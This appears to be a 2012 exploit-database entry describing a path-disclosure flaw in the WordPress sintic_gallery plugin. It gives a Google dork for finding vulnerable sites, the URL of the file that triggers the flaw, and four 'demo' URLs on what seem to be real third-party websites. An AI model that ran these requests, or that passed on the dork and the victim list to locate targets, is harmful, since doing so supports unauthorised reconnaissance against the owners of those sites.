id: 20020
date: 12/21/2012
title: Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
author: The Black Devils
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:sintic_gallery
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------

http://localhost/wp-content/plugins/sintic_gallery/sintic_gallery.php

#------------------
Demo 
http://www.christellerall.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://www.daniel-stawinski.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://theticket-atlanta.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://sinticbolivia.net/clients/kids_guay/wp-content/themes/kids_guay/includes/plugins/sintic_gallery/sintic_gallery.php

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2023-03-22]  #